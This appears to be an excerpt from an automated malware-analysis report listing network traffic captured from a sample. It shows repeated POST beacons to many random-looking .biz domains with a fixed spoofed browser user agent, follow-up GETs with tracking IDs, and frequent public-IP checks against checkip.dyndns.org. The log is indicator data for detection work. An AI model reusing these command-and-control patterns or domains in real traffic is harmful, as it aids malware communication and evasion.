                  Source: global trafficHTTP traffic detected: POST /ncuqcjjolokpyly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /teksk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /lofudptspdtjqfn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET /r?usid=27&utid=12022892926 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /ryyftbrdpkr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: GET /ryyftbrdpkr?usid=27&utid=12022893059 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
                  Source: global trafficHTTP traffic detected: POST /tmcvwhhegsrpvx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /qcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /hshovhcucqxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /ovyjaq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: anpmnmxo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /kt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /a HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: POST /ikcoxctprhexiycp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: anpmnmxo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET /ovyjaq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
                  Source: global trafficHTTP traffic detected: GET /ikcoxctprhexiycp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: www.anpmnmxo.biz
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /wcdojufdhlu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /aivpwrjbclkvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /paucmhg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /ccoms HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET /ccoms?usid=27&utid=12022910001 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                  Source: global trafficHTTP traffic detected: POST /qvxayygldfupog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET /qvxayygldfupog?usid=27&utid=12022910102 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                  Source: global trafficHTTP traffic detected: POST /nutfddbswjlvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /atx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /svryymrfcmvdey HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /gibsr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /oqljmnqcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /uanvewavsjdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /tcyrkgcmm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /xjywxpjxp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /hfdtfkpjtuyhlnko HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /wjuw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /ae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: GET /wjuw?usid=27&utid=12022910910 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
                  Source: global trafficHTTP traffic detected: POST /whnyjpnn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /tnbemtj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /idmrbxil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /wpmmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /nutsjjvailxyuusu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /pfqnb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /bspmtahkiicexhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /dpyks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /mgdeqwhhvaxxpg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /oxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /pwmdxj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /kuokeaklav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /cgdwvsj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /qedsmvjfmtlscamg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 874
                  Source: global trafficHTTP traffic detected: POST /xwff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /pawvnqqcihuodvw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: POST /ipj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
